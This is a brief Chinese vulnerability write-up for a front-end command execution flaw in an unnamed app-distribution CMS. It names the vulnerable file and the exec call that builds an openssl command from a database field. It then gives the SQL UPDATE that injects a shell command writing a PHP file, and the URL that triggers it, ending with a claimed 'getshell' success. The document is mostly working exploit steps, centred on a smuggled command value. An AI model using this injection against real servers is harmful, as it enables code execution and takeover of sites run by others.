
某分发CMS前台命令执行漏洞
简介
需要登陆前台。
需要后台权限。
漏洞位置:/source/index/ajax_profile.php
漏洞代码:exec(‘openssl smime -sign -in ‘ .
这里取得是来自于数据库中 prefix_app 表得 in_app 字段,获取文件名称然后加入到命令之中
我们通过后台得SQL语句执行更新该表中得某个Id得数据in_app 字段得内容为
UPDATE prefix_app SET in_app = '&&echo "<?php phpinfo(); ?>" > 123.php&&1.mobileconfig’ WHERE in_id = '2057'
接着我们访问
/source/index/ajax_profile.php?ac=signed&id=2057
其中得 2057 为你刚才修改得Id参数值。当返回 1 之后则直接访问
Gteshell 成功